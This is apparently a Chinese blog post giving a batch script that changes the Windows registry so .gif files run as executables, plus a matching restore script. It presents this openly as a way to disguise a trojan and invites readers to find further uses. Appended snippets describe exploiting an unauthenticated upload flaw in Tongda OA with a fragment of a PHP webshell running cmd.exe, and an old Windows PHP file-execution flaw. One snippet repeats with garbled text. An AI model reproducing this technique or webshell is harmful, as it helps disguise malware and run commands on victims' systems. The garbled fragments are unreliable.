任意檔案當做***來執行
更改exe為gif:
@echo off
color 1a
echo windows registry editor version 5.00>gif.reg
echo [hkey_local_machine\software\classes\.gif]>>gif.reg
echo @="exefile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
這個**儲存成.bat的檔案。
先執行這個bat檔案,系統會把.gif檔案來當做應用程式來執行
當然我們的***字尾要換成.gif 的。
恢復gif預設:
@echo off
color 1a
echo windows registry editor version 5.00>gif.reg
echo [hkey_local_machine\software\classes\.gif]>>gif.reg
echo "content type"="p_w_picpath/gif">>gif.reg
echo @="giffile">>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
這個**儲存成.bat的檔案。
大家可以發揮想象,有很多可以利用的地方。
通達OA未授權任意檔案上傳和任意檔案包含漏洞復現
建立乙個上傳的頁面 開啟後,上傳乙個jpg,內容如下 儲存為jpg phpwsh new com wscript.shell or die create wscript.shell failed exec phpwsh exec cmd.exe c post cmd stdout exec stdo...
Windows下PHP的任意檔案執行漏洞
受影響系統 php version 4.1.1 under windows php version 4.0.4 under windows 漏洞描述 在windows下的php,通過php.exe,攻擊者可以讓任何檔案作為乙個php檔案,即使這個檔案的副檔名不是php。比如,上傳乙個檔案,但是副檔名...
Windows下PHP的任意檔案執行漏洞
受影響系統 php version 4.1.1 under windows php version 4.lkfzd0.4 under windows 漏洞描述 在windows下的php,通過php.exe,攻擊者可以讓任何檔案作為乙個php檔案,即使這個檔案的副檔名不是php。比如,上傳乙個檔案,...